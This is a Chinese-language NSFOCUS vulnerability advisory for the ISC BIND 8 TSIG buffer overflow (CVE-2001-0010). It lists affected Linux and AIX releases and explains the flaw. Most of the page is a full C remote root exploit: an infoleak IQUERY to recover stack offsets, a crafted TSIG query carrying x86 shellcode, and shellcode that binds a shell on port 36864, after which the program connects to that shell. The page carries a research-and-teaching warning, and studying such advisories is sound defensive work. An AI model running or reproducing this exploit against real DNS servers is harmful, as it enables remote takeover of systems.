NSFOCUS绿盟科技

首页 -> 安全研究

安全研究

安全漏洞

ISC Bind 8 TSIG远程缓冲区溢出漏洞

发布日期：2001-01-29
更新日期：2001-01-29

受影响系统：

ISC BIND 8.2,8.2.1,8.2.2 p5,8.2.2 p6,8.
    - Caldera  eDesktop 2.4
    - Caldera  eDesktop 2.4
    - Caldera  eServer 2.3
    - Caldera  eServer 2.3
    - Caldera OpenLinux Desktop 2.3
    - Caldera OpenLinux Desktop 2.3
    - Conectiva Linux 5.1
    - Conectiva Linux 5.0
    - Conectiva Linux 4.2
    - Conectiva Linux 4.1.1
    - Conectiva Linux 4.1
    - Conectiva Linux 4.0 es
    - Conectiva Linux 4.0
    - Debian Linux 2.3 arm
    - Debian Linux 2.3 68k
    - Debian Linux 2.3 powerpc
    - Debian Linux 2.3 alpha
    - Debian Linux 2.3 sparc
ISC BIND 8.2.1
    - Caldera  eDesktop 2.4
    - Caldera  eServer 2.3
    - Caldera OpenLinux Desktop 2.3
    - Conectiva Linux 5.1
    - Conectiva Linux 5.0
    - Conectiva Linux 4.2
    - Conectiva Linux 4.1.1
    - Conectiva Linux 4.1
    - Conectiva Linux 4.0 es
    - Conectiva Linux 4.0
    - Debian Linux 2.3 alpha
    - Debian Linux 2.3 68k
    - Debian Linux 2.3 powerpc
    - Debian Linux 2.3 arm
    - Debian Linux 2.3 sparc
    - Debian Linux 2.2 alpha
    - Debian Linux 2.2 powerpc
    - Debian Linux 2.2 68k
    - Debian Linux 2.2
    - Debian Linux 2.2 arm
    - Debian Linux 2.2 sparc
    - IBM AIX 4.3.3
    - IBM AIX 4.3.2
    - IBM AIX 4.3.1
    - IBM AIX 4.3
    - Mandrake Linux 7.2
    - Mandrake Linux 7.1
    - Mandrake Linux 7.0
    - Mandrake Linux 6.1
    - Mandrake Linux 6.0
    - RedHat Linux 7.0 sparc
    - RedHat Linux 7.0 alpha
    - RedHat Linux 7.0 x86
    - RedHat Linux 6.2 sparc
    - RedHat Linux 6.2 alpha
    - RedHat Linux 6.2 x86
    - RedHat Linux 6.2
    - RedHat Linux 6.1 alpha
    - RedHat Linux 6.1
    - RedHat Linux 6.1 x86
    - RedHat Linux 6.1 sparc
    - RedHat Linux 6.0
    - RedHat Linux 6.0 alpha
    - RedHat Linux 6.0 x86
    - RedHat Linux 6.0 sparc
    - RedHat Linux 5.2 x86
    - RedHat Linux 5.2 sparc
    - RedHat Linux 5.2
    - RedHat Linux 5.2 alpha
    - RedHat Linux 4.2
    - RedHat Linux 4.1
    - SuSE Linux 6.4 powerpc
    - SuSE Linux 6.4 alpha
    - SuSE Linux 6.3
    - SuSE Linux 6.3 alpha
    - SuSE Linux 6.2
    - SuSE Linux 6.1 alpha
    - SuSE Linux 6.1
    - SuSE Linux 6.0
    - Trustix Secure Linux 1.01
    - Trustix Secure Linux 1.0
ISC BIND 8.2.2 p5
    - Caldera  eDesktop 2.4
    - Caldera  eServer 2.3
    - Caldera OpenLinux Desktop 2.3
    - Conectiva Linux 5.1
    - Conectiva Linux 5.0
    - Conectiva Linux 4.2
    - Conectiva Linux 4.1.1
    - Conectiva Linux 4.1
    - Conectiva Linux 4.0 es
    - Conectiva Linux 4.0
    - Debian Linux 2.3 arm
    - Debian Linux 2.3 sparc
    - Debian Linux 2.3 alpha
    - Debian Linux 2.3 powerpc
    - Debian Linux 2.3 68k
    - Debian Linux 2.2 arm
    - Debian Linux 2.2 sparc
    - Debian Linux 2.2 alpha
    - Debian Linux 2.2 powerpc
    - Debian Linux 2.2 68k
    - Debian Linux 2.2
    - IBM AIX 4.3.3
    - IBM AIX 4.3.2
    - IBM AIX 4.3.1
    - IBM AIX 4.3
    - Mandrake Linux 7.2
    - Mandrake Linux 7.1
    - Mandrake Linux 7.0
    - Mandrake Linux 6.1
    - Mandrake Linux 6.0
    - RedHat Linux 7.0 alpha
    - RedHat Linux 7.0 x86
    - RedHat Linux 7.0 sparc
    - RedHat Linux 6.2 x86
    - RedHat Linux 6.2
    - RedHat Linux 6.2 sparc
    - RedHat Linux 6.2 alpha
    - RedHat Linux 6.1 sparc
    - RedHat Linux 6.1 alpha
    - RedHat Linux 6.1
    - RedHat Linux 6.1 x86
    - RedHat Linux 6.0 sparc
    - RedHat Linux 6.0
    - RedHat Linux 6.0 alpha
    - RedHat Linux 6.0 x86
    - RedHat Linux 5.2
    - RedHat Linux 5.2 alpha
    - RedHat Linux 5.2 x86
    - RedHat Linux 5.2 sparc
    - RedHat Linux 4.2
    - RedHat Linux 4.1
    - SuSE Linux 6.4 powerpc
    - SuSE Linux 6.4 alpha
    - SuSE Linux 6.3
    - SuSE Linux 6.3 alpha
    - SuSE Linux 6.2
    - SuSE Linux 6.1 alpha
    - SuSE Linux 6.1
    - SuSE Linux 6.0
    - Trustix Secure Linux 1.01
    - Trustix Secure Linux 1.0
ISC BIND 8.2.2 p6
    - Caldera  eDesktop 2.4
    - Caldera  eServer 2.3
    - Caldera OpenLinux Desktop 2.3
    - Conectiva Linux 5.1
    - Conectiva Linux 5.0
    - Conectiva Linux 4.2
    - Conectiva Linux 4.1.1
    - Conectiva Linux 4.1
    - Conectiva Linux 4.0 es
    - Conectiva Linux 4.0
    - Debian Linux 2.3 68k
    - Debian Linux 2.3 arm
    - Debian Linux 2.3 sparc
    - Debian Linux 2.3 alpha
    - Debian Linux 2.3 powerpc
    - Debian Linux 2.2 68k
    - Debian Linux 2.2
    - Debian Linux 2.2 arm
    - Debian Linux 2.2 sparc
    - Debian Linux 2.2 alpha
    - Debian Linux 2.2 powerpc
    - IBM AIX 4.3.3
    - IBM AIX 4.3.2
    - IBM AIX 4.3.1
    - IBM AIX 4.3
    - Mandrake Linux 7.2
    - Mandrake Linux 7.1
    - Mandrake Linux 7.0
    - Mandrake Linux 6.1
    - Mandrake Linux 6.0
    - RedHat Linux 7.0 alpha
    - RedHat Linux 7.0 x86
    - RedHat Linux 7.0 sparc
    - RedHat Linux 6.2 alpha
    - RedHat Linux 6.2 x86
    - RedHat Linux 6.2
    - RedHat Linux 6.2 sparc
    - RedHat Linux 6.1
    - RedHat Linux 6.1 x86
    - RedHat Linux 6.1 sparc
    - RedHat Linux 6.1 alpha
    - RedHat Linux 6.0 sparc
    - RedHat Linux 6.0
    - RedHat Linux 6.0 alpha
    - RedHat Linux 6.0 x86
    - RedHat Linux 5.2 sparc
    - RedHat Linux 5.2
    - RedHat Linux 5.2 alpha
    - RedHat Linux 5.2 x86
    - RedHat Linux 4.2
    - RedHat Linux 4.1
    - SuSE Linux 6.4 powerpc
    - SuSE Linux 6.4 alpha
    - SuSE Linux 6.3
    - SuSE Linux 6.3 alpha
    - SuSE Linux 6.2
    - SuSE Linux 6.1 alpha
    - SuSE Linux 6.1
    - SuSE Linux 6.0
    - Trustix Secure Linux 1.01
    - Trustix Secure Linux 1.0
ISC BIND 8.2.2 p7
    - Caldera  eDesktop 2.4
    - Caldera  eServer 2.3
    - Caldera OpenLinux Desktop 2.3
    - Conectiva Linux 5.1
    - Conectiva Linux 5.0
    - Conectiva Linux 4.2
    - Conectiva Linux 4.1.1
    - Conectiva Linux 4.1
    - Conectiva Linux 4.0 es
    - Conectiva Linux 4.0
    - Debian Linux 2.3 alpha
    - Debian Linux 2.3 sparc
    - Debian Linux 2.3 arm
    - Debian Linux 2.3 68k
    - Debian Linux 2.3 powerpc
    - Debian Linux 2.2 alpha
    - Debian Linux 2.2 sparc
    - Debian Linux 2.2 arm
    - Debian Linux 2.2
    - Debian Linux 2.2 68k
    - Debian Linux 2.2 powerpc
    - IBM AIX 4.3.3
    - IBM AIX 4.3.2
    - IBM AIX 4.3.1
    - IBM AIX 4.3
    - Mandrake Linux 7.2
    - Mandrake Linux 7.1
    - Mandrake Linux 7.0
    - Mandrake Linux 6.1
    - Mandrake Linux 6.0
    - RedHat Linux 7.0 x86
    - RedHat Linux 7.0 alpha
    - RedHat Linux 7.0 sparc
    - RedHat Linux 6.2 sparc
    - RedHat Linux 6.2
    - RedHat Linux 6.2 x86
    - RedHat Linux 6.2 alpha
    - RedHat Linux 6.1 sparc
    - RedHat Linux 6.1 x86
    - RedHat Linux 6.1
    - RedHat Linux 6.1 alpha
    - RedHat Linux 6.0 alpha
    - RedHat Linux 6.0
    - RedHat Linux 6.0 sparc
    - RedHat Linux 6.0 x86
    - RedHat Linux 5.2 alpha
    - RedHat Linux 5.2
    - RedHat Linux 5.2 sparc
    - RedHat Linux 5.2 x86
    - RedHat Linux 4.2
    - RedHat Linux 4.1
    - SuSE Linux 6.4 powerpc
    - SuSE Linux 6.4 alpha
    - SuSE Linux 6.3
    - SuSE Linux 6.3 alpha
    - SuSE Linux 6.2
    - SuSE Linux 6.1
    - SuSE Linux 6.1 alpha
    - SuSE Linux 6.0
    - Trustix Secure Linux 1.01
    - Trustix Secure Linux 1.0

不受影响系统：

ISC BIND 8.2.3
    - EnGarde Secure Linux 1.0.1
ISC BIND 9.0
    - EnGarde Secure Linux 1.0.1
ISC BIND 9.0
    - SuSE Linux 7.0 alpha
ISC BIND 9.0
    - SuSE Linux 7.0 sparc
ISC BIND 9.0
    - SuSE Linux 7.0 i386
ISC BIND 9.0
    - SuSE Linux 7.0 powerpc

描述：

BUGTRAQ  ID: 2302
CVE(CAN) ID: CVE-2001-0010

BIND是一个实现域名服务协议的服务器软件。它在Internet上被广为使用。

它在TSIG（传输签名）的实现上存在一个缓冲区溢出漏洞，可能允许远程攻击者在BIND服务器上执行任意代码。由于溢出发生在DNS请求的初始化过程中，因此并不需要攻击者控制任何地权威DNS服务器，而且此问题影响所有递归和非递归的DNS服务器。

当收到一个DNS请求时，根据传输协议的不同，DNS请求的数据可能被存放到heap区或者是堆栈中。如果收到的是UDP报文，函数datagram_read()负责将其读入堆栈中的一个513字节大小的缓冲区（u.buf）；如果收到的是TCP报文，函数stream_getlen()负责将其读入位于heap区的一个64k大小的缓冲区(sp->s_buf).BIND使用两个关键的变量来跟踪这些缓冲区的使用情况：一个包含缓冲区中的实际长度，名为"msglen";另一个变量用来跟踪缓冲区的剩余长度，名为"buflen"。当BIND收到一个DNS信息后，msglen被初始化成从网络中接收到的数据长度。buflen被初始化成用来读取这个消息的缓冲区的大小。(对于UDP报文为512字节，对TCP报文为64k)。正常情况下，当BIND处理一个请求时，它会将回复记录附加到请求中。然后它会编辑DNS头，使其反映出这种变化，并发送此响应报文。在此过程中，BIND假设msglen加上buflen的大小等于缓冲区的原长度。从BIND 8.2开始，在BIND处理一个DNS请求之前，它会检查DNS信息的附加区域，检查是否有TSIG资源记录。函数ns_find_tsig()被用来进行这个检查。如果一个有效的TSIG标记被找到，但相应的安全字(security key)却没有找到，BIND将会报错，并绕过了正常的请求处理过程。结果，msglen和buflen都仍然保持它们的初始值。BIND将此请求看作时一个错误请求，它使用原来的请求缓冲区，在问题域中增加一段TSIG信息。这时候，BIND假设请求缓冲区的大小仍然是msglen+buflen.正常情况下，这是正确的，然而，在这种特殊情况下，msglen+buflen几乎是实际缓冲区大小的两倍！这样，当BIND使用ns_sign()函数添加TSIG信息时，它们将被填充在缓冲区之外。由于有效的安全字没有被发现，ns_sign()将只会增加很少的一些字节，而且字节的内容也是有限的。因此这可能导致两种类型的攻击。对于UDP请求，请求缓冲区在堆栈中，攻击者可以使用一些固定的值来覆盖datagram_read()函数保存在堆栈中的激活记录。在x86平台下，用0覆盖保留栈帧指针的最小字节，可能导致该指针指向原来的DNS请求缓冲区。这种单字节溢出可能导致执行任意代码。对于TCP请求，请求缓冲区在heap区中。攻击者可以使用一些固定的值来覆盖malloc()动态分配时的一些边界字节，这样下一个边界信息就可以从攻击者控制的缓冲区中读取，这可能导致一个恶意的指针覆盖，攻击者也可能执行任意代码。

<*来源：Anthony Osborne
        John McDonald

  链接：http://www.cert.org/advisories/CA-2001-02.html
        http://distro.conectiva.com.br/atualizacoes/?id=a&anuncio=000377
        http://web.opennet.ru/base/netsoft/988181599_966.txt.html
        http://www.caldera.com/support/security/advisories/CSSA-2001-008.1.txt
        ftp://stage.caldera.com/pub/security/openunix/CSSA-2001-SCO.13/
        ftp://stage.caldera.com/pub/security/openunix/CSSA-2002-SCO.16
        http://www.debian.org/security/2001/dsa-026
        https://www.redhat.com/support/errata/RHSA-2001-007.html
        http://www.suse.com/de/support/security/2001_03_[需要添加]_txt.txt
        http://www.turbolinux.com/pipermail/tl-security-announce/2001-February/000034.html
*>

测试方法：

警告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

Ix（adresadeforward@yahoo.com） lucysoft（lucysoft@hotmail.com）提供了如下测试程序：

/*
* This exploit has been fixed and extensive explanation and clarification
* added.
* Cleanup done by:
*     Ian Goldberg     <ian@cypherpunks.ca>
*     Jonathan Wilkins <jwilkins@bitland.net>
* NOTE: the default installation of RedHat 6.2 seems to not be affected
* due to the compiler options.  If BIND is built from source then the
* bug is able to manifest itself.
*/
/*
* Original Comment:
* lame named 8.2.x remote exploit by
*
*   Ix        [adresadeforward@yahoo.com] (the master of jmpz),
*   lucysoft    [lucysoft@hotmail.com] (the master of queries)
*
* this exploits the named INFOLEAK and TSIG bug (see http://www.isc.org/products/BIND/bind-security.html)
* linux only shellcode
* this is only for demo purposes, we are not responsable in any way for what you do with this code.
*
* flamez     - canaris
* greetz    - blizzard, netman.
* creditz    - anathema <anathema@hack.co.za> for the original shellcode
*          - additional code ripped from statdx exploit by ron1n
*
* woo, almost forgot... this exploit is pretty much broken (+4 errors), but we hope you got the idea.
* if you understand how it works, it won't be too hard to un-broke it
*/

#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
#include <signal.h>
#include <time.h>
#include <string.h>
#include <ctype.h>
#include <netdb.h>
#include <netinet/in.h>
#include <netinet/in_systm.h>
#include <sys/time.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <arpa/inet.h>
#include <arpa/nameser.h>

#define max(a,b) ((a)>(b)?(a):(b))

#define BUFFSIZE 4096

int argevdisp1, argevdisp2;

char shellcode[] =
/* The numbers at the right indicate the number of bytes the call takes
* and the number of bytes used so far.  This needs to be lower than
* 62 in order to fit in a single Query Record.  2 are used in total to
* send the shell code
*/
/* main: */
/* "callz" is more than 127 bytes away, so we jump to an intermediate
   spot first */
"\xeb\x44"                           /* jmp intr                */ // 2 - 2
/* start: */
"\x5e"                               /* popl %esi               */ // 1 - 3

  /* socket() */
"\x29\xc0"                           /* subl %eax, %eax         */ // 2 - 5
"\x89\x46\x10"                       /* movl %eax, 0x10(%esi)   */ // 3 - 8
"\x40"                               /* incl %eax               */ // 1 - 9
"\x89\xc3"                           /* movl %eax, %ebx         */ // 2 - 11
"\x89\x46\x0c"                       /* movl %eax, 0x0c(%esi)   */ // 3 - 14
"\x40"                               /* incl %eax               */ // 1 - 15
"\x89\x46\x08"                       /* movl %eax, 0x08(%esi)   */ // 3 - 18
"\x8d\x4e\x08"                       /* leal 0x08(%esi), %ecx   */ // 3 - 21
"\xb0\x66"                           /* movb $0x66, %al         */ // 2 - 23
"\xcd\x80"                           /* int $0x80               */ // 2 - 25

  /* bind() */
"\x43"                               /* incl %ebx               */ // 1 - 26
"\xc6\x46\x10\x10"                   /* movb $0x10, 0x10(%esi)  */ // 4 - 30
"\x66\x89\x5e\x14"                   /* movw %bx, 0x14(%esi)    */ // 4 - 34
"\x88\x46\x08"                       /* movb %al, 0x08(%esi)    */ // 3 - 37
"\x29\xc0"                           /* subl %eax, %eax         */ // 2 - 39
"\x89\xc2"                           /* movl %eax, %edx         */ // 2 - 41
"\x89\x46\x18"                       /* movl %eax, 0x18(%esi)   */ // 3 - 44
/*
* the port address in hex (0x9000 = 36864), if this is changed, then a similar
* change must be made in the connection() call
* NOTE: you only get to set the high byte
*/
"\xb0\x90"                           /* movb $0x90, %al         */ // 2 - 46
"\x66\x89\x46\x16"                   /* movw %ax, 0x16(%esi)    */ // 4 - 50
"\x8d\x4e\x14"                       /* leal 0x14(%esi), %ecx   */ // 3 - 53
"\x89\x4e\x0c"                       /* movl %ecx, 0x0c(%esi)   */ // 3 - 56
"\x8d\x4e\x08"                       /* leal 0x08(%esi), %ecx   */ // 3 - 59

"\xeb\x02"                           /* jmp cont                */ // 2 - 2
/* intr: */
"\xeb\x43"                           /* jmp callz               */ // 2 - 4

/* cont: */
"\xb0\x66"                           /* movb $0x66, %al         */ // 2 - 6
"\xcd\x80"                           /* int $0x80               */ // 2 - 10

  /* listen() */
"\x89\x5e\x0c"                       /* movl %ebx, 0x0c(%esi)   */ // 3 - 11
"\x43"                               /* incl %ebx               */ // 1 - 12
"\x43"                               /* incl %ebx               */ // 1 - 13
"\xb0\x66"                           /* movb $0x66, %al         */ // 2 - 15
"\xcd\x80"                           /* int $0x80               */ // 2 - 17

  /* accept() */
"\x89\x56\x0c"                       /* movl %edx, 0x0c(%esi)   */ // 3 - 20
"\x89\x56\x10"                       /* movl %edx, 0x10(%esi)   */ // 3 - 23
"\xb0\x66"                           /* movb $0x66, %al         */ // 2 - 25
"\x43"                               /* incl %ebx               */ // 1 - 26
"\xcd\x80"                           /* int $0x80               */ // 1 - 27

  /* dup2(s, 0); dup2(s, 1); dup2(s, 2); */
"\x86\xc3"                           /* xchgb %al, %bl          */ // 2 - 29
"\xb0\x3f"                           /* movb $0x3f, %al         */ // 2 - 31
"\x29\xc9"                           /* subl %ecx, %ecx         */ // 2 - 33
"\xcd\x80"                           /* int $0x80               */ // 2 - 35
"\xb0\x3f"                           /* movb $0x3f, %al         */ // 2 - 37
"\x41"                               /* incl %ecx               */ // 1 - 38
"\xcd\x80"                           /* int $0x80               */ // 2 - 40
"\xb0\x3f"                           /* movb $0x3f, %al         */ // 2 - 42
"\x41"                               /* incl %ecx               */ // 1 - 43
"\xcd\x80"                           /* int $0x80               */ // 2 - 45

  /* execve() */
"\x88\x56\x07"                       /* movb %dl, 0x07(%esi)    */ // 3 - 48
"\x89\x76\x0c"                       /* movl %esi, 0x0c(%esi)   */ // 3 - 51
"\x87\xf3"                           /* xchgl %esi, %ebx        */ // 2 - 53
"\x8d\x4b\x0c"                       /* leal 0x0c(%ebx), %ecx   */ // 3 - 56
"\xb0\x0b"                           /* movb $0x0b, %al         */ // 2 - 58
"\xcd\x80"                           /* int $0x80               */ // 2 - 60

"\x90"

/* callz: */
"\xe8\x72\xff\xff\xff"               /* call start              */ // 5 - 5
"/bin/sh"; /* There's a NUL at the end here */                     // 8 - 13

unsigned long resolve_host(char* host)
{
    long res;
    struct hostent* he;

    if (0 > (res = inet_addr(host)))
    {
        if (!(he = gethostbyname(host)))
            return(0);
        res = *(unsigned long*)he->h_addr;
    }
    return(res);
}

int dumpbuf(char *buff, int len)
{
    char line[17];
    int x;

    /* print out a pretty hex dump */
    for(x=0;x<len;x++){
        if(!(x%16) && x){
            line[16] = 0;
            printf("\t%s\n", line);
        }
        printf("%02X ", (unsigned char)buff[x]);
        if(isprint((unsigned char)buff[x]))
            line[x%16]=buff[x];
        else
            line[x%16]='.';
    }
    printf("\n");
}

void
runshell(int sockd)
{
    char buff[1024];
    int fmax, ret;
    fd_set fds;

    fmax = max(fileno(stdin), sockd) + 1;
    send(sockd, "uname -a; id;\n", 15, 0);

    for(;;)
    {

        FD_ZERO(&fds);
        FD_SET(fileno(stdin), &fds);
        FD_SET(sockd, &fds);

        if(select(fmax, &fds, NULL, NULL, NULL) < 0)
        {
            exit(EXIT_FAILURE);
        }

        if(FD_ISSET(sockd, &fds))
        {
            bzero(buff, sizeof buff);
            if((ret = recv(sockd, buff, sizeof buff, 0)) < 0)
            {
                exit(EXIT_FAILURE);
            }
            if(!ret)
            {
                fprintf(stderr, "Connection closed\n");
                exit(EXIT_FAILURE);
            }
            write(fileno(stdout), buff, ret);
        }

        if(FD_ISSET(fileno(stdin), &fds))
        {
            bzero(buff, sizeof buff);
            ret = read(fileno(stdin), buff, sizeof buff);
            if(send(sockd, buff, ret, 0) != ret)
            {
                fprintf(stderr, "Transmission loss\n");
                exit(EXIT_FAILURE);
            }
        }
    }
}

connection(struct sockaddr_in host)
{
    int sockd;

    host.sin_port = htons(36864);

    printf("[*] connecting..\n");
    usleep(2000);

    if((sockd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0)
    {
        exit(EXIT_FAILURE);
    }

    if(connect(sockd, (struct sockaddr *) &host, sizeof host) != -1)
    {
        printf("[*] wait for your shell..\n");
        usleep(500);
            runshell(sockd);
    }
    else
    {
        printf("[x] error: named not vulnerable or wrong offsets used\n");
    }

    close(sockd);
}

int infoleak_qry(char* buff)
{
        HEADER* hdr;
        int n, k;
        char* ptr;
        int qry_space = 12;
        int dummy_names = 7;
        int evil_size = 0xff;

        memset(buff, 0, BUFFSIZE);
        hdr = (HEADER*)buff;

        hdr->id = htons(0xbeef);
        hdr->opcode  = IQUERY;
        hdr->rd      = 1;
        hdr->ra      = 1;
        hdr->qdcount = htons(0);
        hdr->nscount = htons(0);
        hdr->ancount = htons(1);
        hdr->arcount = htons(0);

    ptr = buff + sizeof(HEADER);
    printf("[d] HEADER is %d long\n", sizeof(HEADER));

    n = 62;

    for(k=0; k < dummy_names; k++)
    {
        *ptr++ = n;
        ptr += n;
    }
    ptr += 1;

        PUTSHORT(1/*ns_t_a*/, ptr);              /* type */
        PUTSHORT(T_A, ptr);                      /* class */
        PUTLONG(1, ptr);                        /* ttl */

    PUTSHORT(evil_size, ptr);            /* our *evil* size */

    return(ptr - buff + qry_space);

}

int evil_query(char* buff, int offset)
{
    int lameaddr, shelladdr, rroffsetidx, rrshellidx, deplshellcode, offset0;
    HEADER* hdr;
    char *ptr;
    int k, bufflen;
    u_int n, m;
    u_short s;
    int i;
    int shelloff, shellstarted, shelldone;
    int towrite, ourpack;
    int n_dummy_rrs = 7;

    printf("[d] evil_query(buff, %08x)\n", offset);
    printf("[d] shellcode is %d long\n", sizeof(shellcode));

    shelladdr = offset - 0x200;

        lameaddr  = shelladdr + 0x300;

    ourpack = offset - 0x250 + 2;
    towrite = (offset & ~0xff) - ourpack - 6;
    printf("[d] olb = %d\n", (unsigned char) (offset & 0xff));

    rroffsetidx = towrite / 70;
    offset0 = towrite - rroffsetidx * 70;

    if ((offset0 > 52) || (rroffsetidx > 6))
    {
        printf("[x] could not write our data in buffer (offset0=%d, rroffsetidx=%d)\n", offset0, rroffsetidx);
        return(-1);
    }

    rrshellidx = 1;
    deplshellcode = 2;

    hdr = (HEADER*)buff;

    memset(buff, 0, BUFFSIZE);

    /* complete the header */

    hdr->id = htons(0xdead);
    hdr->opcode  = QUERY;
    hdr->rd      = 1;
    hdr->ra      = 1;
    hdr->qdcount = htons(n_dummy_rrs);
    hdr->ancount = htons(0);
    hdr->arcount = htons(1);

    ptr = buff + sizeof(HEADER);

    shellstarted = 0;
    shelldone = 0;
    shelloff = 0;

    n = 63;
    for (k = 0; k < n_dummy_rrs; k++)
    {
        *ptr++ = (char)n;

        for(i = 0; i < n-2; i++)
        {
            if((k == rrshellidx) && (i == deplshellcode) && !shellstarted)
            {
                printf("[*] injecting shellcode at %d\n", k);
                shellstarted = 1;
            }

            if ((k == rroffsetidx) && (i == offset0))
            {
                *ptr++ = lameaddr & 0x000000ff;
                *ptr++ = (lameaddr & 0x0000ff00) >> 8;
                *ptr++ = (lameaddr & 0x00ff0000) >> 16;
                *ptr++ = (lameaddr & 0xff000000) >> 24;
                *ptr++ = shelladdr & 0x000000ff;
                *ptr++ = (shelladdr & 0x0000ff00) >> 8;
                *ptr++ = (shelladdr & 0x00ff0000) >> 16;
                *ptr++ = (shelladdr & 0xff000000) >> 24;
                                *ptr++ = argevdisp1 & 0x000000ff;
                                *ptr++ = (argevdisp1 & 0x0000ff00) >> 8;
                                *ptr++ = (argevdisp1 & 0x00ff0000) >> 16;
                                *ptr++ = (argevdisp1 & 0xff000000) >> 24;
                                *ptr++ = argevdisp2 & 0x000000ff;
                                *ptr++ = (argevdisp2 & 0x0000ff00) >> 8;
                                *ptr++ = (argevdisp2 & 0x00ff0000) >> 16;
                                *ptr++ = (argevdisp2 & 0xff000000) >> 24;
                i += 15;
            }
            else
            {
                if (shellstarted && !shelldone)
                {
                    *ptr++ = shellcode[shelloff++];
                    if(shelloff == (sizeof(shellcode)))
                        shelldone=1;
                }
                else
                {
                    *ptr++ = i;
                }
            }
        }

        /* OK: this next set of bytes constitutes the end of the
                 *     NAME field, the QTYPE field, and the QCLASS field.
                 *     We have to have the shellcode skip over these bytes,
                 *     as well as the leading 0x3f (63) byte for the next
                 *     NAME field.  We do that by putting a jmp instruction
                 *     here.
                 */
        *ptr++ = 0xeb;

        if (k == 0)
        {
            *ptr++ = 10;

            /* For alignment reasons, we need to stick an extra
                         * NAME segment in here, of length 3 (2 + header).
                         */
            m = 2;
            *ptr++ = (char)m;        // header
            ptr += 2;
        }
        else
        {
            *ptr++ = 0x07;
        }

        /* End the NAME with a compressed pointer.  Note that it's
                 * not clear that the value used, C0 00, is legal (it
                 * points to the beginning of the packet), but BIND apparently
                 * treats such things as name terminators, anyway.
                 */
        *ptr++ = 0xc0; /*NS_CMPRSFLGS*/
        *ptr++ = 0x00; /*NS_CMPRSFLGS*/

        ptr += 4;      /* QTYPE, QCLASS */
    }

    /* Now we make the TSIG AR */
    *ptr++ = 0x00;       /* Empty name */

    PUTSHORT(0xfa, ptr); /* Type  TSIG */
    PUTSHORT(0xff, ptr); /* Class ANY  */

    bufflen = ptr - buff;

    // dumpbuf(buff, bufflen);

    return(bufflen);
}

long xtract_offset(char* buff, int len)
{
    long ret;

    /* Here be dragons. */
    /* (But seriously, the values here depend on compilation options
         *  used for BIND.
         */
    ret = *((long*)&buff[0x214]);
    argevdisp1 = 0x080d7cd0;
    argevdisp2 = *((long*)&buff[0x264]);
    printf("[d] argevdisp1 = %08x, argevdisp2 = %08x\n",
        argevdisp1, argevdisp2);

    // dumpbuf(buff, len);

    return(ret);
}

int main(int argc, char* argv[])
{
    struct sockaddr_in sa;
    int sock;
    long address;
    char buff[BUFFSIZE];
    int len, i;
    long offset;
    socklen_t reclen;
    unsigned char foo[4];

    printf("[*] named 8.2.x (< 8.2.3-REL) remote root exploit by lucysoft, Ix\n");
    printf("[*] fixed by ian@cypherpunks.ca and jwilkins@bitland.net\n\n");

    address = 0;
    if (argc < 2)
    {
        printf("[*] usage : %s host\n", argv[0]);

        return(-1);
    }

    if (!(address = resolve_host(argv[1])))
    {
        printf("[x] unable to resolve %s, try using an IP address\n", argv[1]);
        return(-1);
    } else {
        memcpy(foo, &address, 4);
        printf("[*] attacking %s (%d.%d.%d.%d)\n", argv[1], foo[0], foo[1], foo[2], foo[3]);
    }

    sa.sin_family = AF_INET;

    if (0 > (sock = socket(sa.sin_family, SOCK_DGRAM, 0)))
    {
        return(-1);
    }

    sa.sin_family = AF_INET;
    sa.sin_port = htons(53);
    sa.sin_addr.s_addr= address;


    len = infoleak_qry(buff);
    printf("[d] infoleak_qry was %d long\n", len);
    len = sendto(sock, buff, len, 0 , (struct sockaddr *)&sa, sizeof(sa));
    if (len < 0)
    {
        printf("[*] unable to send iquery\n");
        return(-1);
    }

    reclen = sizeof(sa);
    len = recvfrom(sock, buff, BUFFSIZE, 0, (struct sockaddr *)&sa, &reclen);
    if (len < 0)
    {
                printf("[x] unable to receive iquery answer\n");
                return(-1);
    }
    printf("[*] iquery resp len = %d\n", len);

    offset = xtract_offset(buff, len);
    printf("[*] retrieved stack offset = %x\n", offset);


    len = evil_query(buff, offset);
    if(len < 0){
        printf("[x] error sending tsig packet\n");
        return(0);
    }

    sendto(sock, buff, len, 0 , (struct sockaddr *)&sa, sizeof(sa));

    if (0 > close(sock))
    {
        return(-1);
    }

    connection(sa);

    return(0);
}
/*                   www.hack.co.za  [2 March 2001]*/

建议：

关于我们: 公司介绍; 公司荣誉; 公司新闻

联系我们: 公司总部; 分支机构; 海外机构

快速链接: 绿盟云; 绿盟威胁情报中心NTI; 技术博客